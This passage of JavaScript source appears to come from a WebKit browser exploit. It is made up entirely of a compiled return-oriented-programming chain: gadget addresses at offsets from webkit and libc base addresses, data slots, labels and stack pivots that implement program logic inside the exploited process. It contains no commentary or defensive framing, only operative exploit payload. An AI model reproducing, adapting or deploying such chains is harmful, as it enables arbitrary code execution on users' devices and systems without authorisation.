rsi ropchain+243096, //L4403 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+243064, //L4401 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L4401: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4402: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4403: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+243240, //L4406 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+243256, //L4407 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+243208, //L4404 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L4404: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4405: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L4406: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4407: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+346125, //setne al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+243328, //L4408 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4408: db([0, 0]); // 0x0 //L4369: set_gadgets([ libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+243456, //L4411 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+243472, //L4412 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+243440, //L4410 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L4410: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4411: db([0, 0]); // 0x0 
set_gadget(libc_base+759608,); //pop rax //L4412: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+243632, //L4417 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+243648, //L4418 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+243584, //L4414 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L4414: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4415: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L4416: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L4417: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4418: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+243760, //L4419+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+243752, //L4419 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L4419: db([0, 0]); // 0x0 set_gadgets([ ropchain+243776, //L4419+24 ropchain+244728, //L4413 libc_base+764760, //pop rsi ropchain+243816, //L4420 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L4420: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4422: db([56, 0]); // 0x38 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+243936, //L4425 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+243920, //L4423 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4423: db([0, 0]); // 0x0 
set_gadget(libc_base+144605,); //pop rdi //L4425: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+244080, //L4428 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+244048, //L4426 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+244064, //L4427 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4426: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4427: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4428: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+244176, //L4430 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4429: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L4430: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4431: db([32, 0]); // 0x20 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+244280, //L4432 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+244296, //L4433 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4432: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4433: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al webkit_base+5168252, //setl al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+244472, //L4435 webkit_base+660161, //mov 
[rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+244488, //L4436 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+244456, //L4434 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L4434: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4435: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4436: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+244632, //L4439 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+244648, //L4440 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+244600, //L4437 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L4437: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4438: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L4439: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4440: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+346125, //setne al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+244720, //L4441 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4441: db([0, 0]); // 0x0 //L4413: set_gadgets([ libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+244848, //L4444 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+244864, //L4445 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+244832, //L4443 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L4443: db([0, 
0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4444: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4445: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+244976, //L4447 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+245024, //L4450 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+244992, //L4448 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L4447: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4448: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4449: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4450: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+245136, //L4451+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+245128, //L4451 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L4451: db([0, 0]); // 0x0 set_gadgets([ ropchain+245152, //L4451+24 ropchain+247176, //L4446 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+245192, //L4452 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L4452: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4453: db([120, 0]); // 0x78 set_gadget(libc_base+144605,); //pop rdi //L4454: db([120, 0]); // 0x78 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+245384, //L4458 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+245352, //L4456 webkit_base+660161, //mov [rsi], rax ; mov al, 1 
webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+245368, //L4457 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4455: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L4456: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4457: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4458: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+245440, //L4460 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L4460: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+245568, //L4462 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+245584, //L4463 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+245552, //L4461 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4461: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L4462: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4463: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+245680, //L4465 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+245664, //L4464 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L4464: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4465: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+245760, //L4466 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 
//pop rcx ]); //L4466: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4468: db([48, 0]); // 0x30 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+245880, //L4471 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+245864, //L4469 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4469: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4471: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+246024, //L4474 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+245992, //L4472 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+246008, //L4473 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4472: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4473: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4474: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+246096, //L4476 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4476: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+246152, //L4477 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4477: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+246232, //L4479 webkit_base+660161, //mov [rsi], rax ; mov al, 1 
libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L4479: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4481: db([56, 0]); // 0x38 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+246352, //L4484 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+246336, //L4482 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4482: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4484: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+246496, //L4487 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+246464, //L4485 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+246480, //L4486 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4485: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4486: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4487: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+246584, //L4489 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L4488: db([1, 0]); // 0x1 set_gadget(libc_base+759608,); //pop rax //L4489: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+246640, //L4490 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L4490: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4492: db([56, 0]); // 0x38 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov 
[rax], rcx libc_base+764760, //pop rsi ropchain+246720, //L4494 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4494: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+246824, //L4495 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+246840, //L4496 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4495: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4496: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+246928, //L4498 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4498: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+246984, //L4499 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4499: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+247056, //L4502 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4502: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+247112, //L4503 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4503: db([0, 0]); // 0x0 set_gadgets([ 
webkit_base+1121481, //mov [rax], cl libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+782311, //pop rsp ropchain+258080, //L4505 //L4446: libc_base+764760, //pop rsi ropchain+247216, //L4506 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L4506: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4508: db([72, 0]); // 0x48 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+247336, //L4511 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+247320, //L4509 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4509: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4511: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+247512, //L4514 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+247528, //L4515 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+247480, //L4512 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+247496, //L4513 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4512: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L4513: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4514: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4515: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+247688, //L4519 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx 
libc_base+764760, //pop rsi ropchain+247656, //L4517 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+247672, //L4518 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4516: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L4517: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4518: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4519: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+247792, //L4521 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+247776, //L4520 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4520: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4521: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+247888, //L4523 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4522: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L4523: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4524: db([16, 0]); // 0x10 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+247992, //L4525 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+248008, //L4526 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4525: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4526: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 
4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+248176, //L4528 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+248192, //L4529 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+248160, //L4527 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L4527: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4528: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4529: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+248352, //L4534 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+248368, //L4535 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+248304, //L4531 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L4531: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4532: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L4533: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L4534: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4535: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+248480, //L4536+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+248472, //L4536 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L4536: db([0, 0]); // 0x0 set_gadgets([ ropchain+248496, //L4536+24 
ropchain+249536, //L4530 libc_base+764760, //pop rsi ropchain+248536, //L4537 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L4537: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4539: db([96, 0]); // 0x60 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+248656, //L4542 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+248640, //L4540 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4540: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4542: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+248832, //L4545 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+248848, //L4546 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+248800, //L4543 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+248816, //L4544 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4543: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L4544: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4545: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4546: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+248944, //L4548 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+248928, //L4547 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L4547: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4548: db([0, 0]); // 0x0 
set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L4549: db([1, 0]); // 0x1 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L4550: db([5, 0]); // 0x5 set_gadget(libc_base+763368,); //pop rcx //L4551: db([5, 0]); // 0x5 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+249144, //L4553 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4553: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+249200, //L4554 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4554: db([0, 